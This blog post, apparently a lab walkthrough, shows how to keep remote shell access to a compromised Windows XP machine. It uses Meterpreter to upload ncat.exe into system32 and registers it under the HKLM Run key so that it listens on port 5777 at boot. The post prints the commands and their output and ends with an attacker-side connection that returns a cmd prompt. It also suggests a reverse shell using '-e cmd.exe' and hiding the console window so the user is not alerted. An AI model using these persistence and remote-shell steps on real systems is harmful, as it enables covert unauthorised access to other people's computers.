I couldn’t figure out how to do this in Armitage, so I had to resort to the good ol’ Terminal.
I exploited the XP system as per this post and obtained a Meterpreter shell.
First, upload the ncat.exe file to the target machine:
meterpreter > upload ncat.exe c:\\windows\\system32
[*] uploading  : ncat.exe -> c:\windows\system32
[*] uploaded   : ncat.exe -> c:\windows\system32\ncat.exe
meterpreter >
Next we need to get Ncat to execute on startup, so we add a value for it under the Run key in the Windows Registry (HKLM\software\microsoft\windows\currentversion\run):
(Sorry, the above is an image; pasting the code in messed up WordPress.)
Note that the -l (listen) and 5777 (port number) arguments are set at this point, so the Run value starts Ncat listening on TCP port 5777.
We can double-check that our program is in the registry:
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values (5):

    VMware hqtray
    TgZcTlqTJNmSbP
    TIOzUGrTHgMzS
    zmvSLZpTksgWih
    ncat

meterpreter >
As we can see, ncat is included.
Now reboot the target XP machine and see if we can establish a connection from the attacking machine:
# ncat 192.168.1.79 5777
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Lab1>
Voilà!
Two issues to note.
Firstly, a dirty great big command box is opened on startup, which terminates our connection if the user closes it.
Secondly, I haven’t dealt with any tricky firewall issues that may prevent the inbound connection.
Worth noting too: a bind listener like this accepts a connection from anyone who can reach port 5777, not just us. Ncat’s --allow option restricts which source addresses it will accept, and a reverse connection (Ncat connecting back to a listener on the attacking machine with -e cmd.exe) sidesteps the inbound-firewall problem entirely, at the cost of needing our listener up whenever the target boots.
However, as a proof of concept it works perfectly, and I’m sure there are ways to prevent the command box opening so that the Ncat program runs without alerting the user.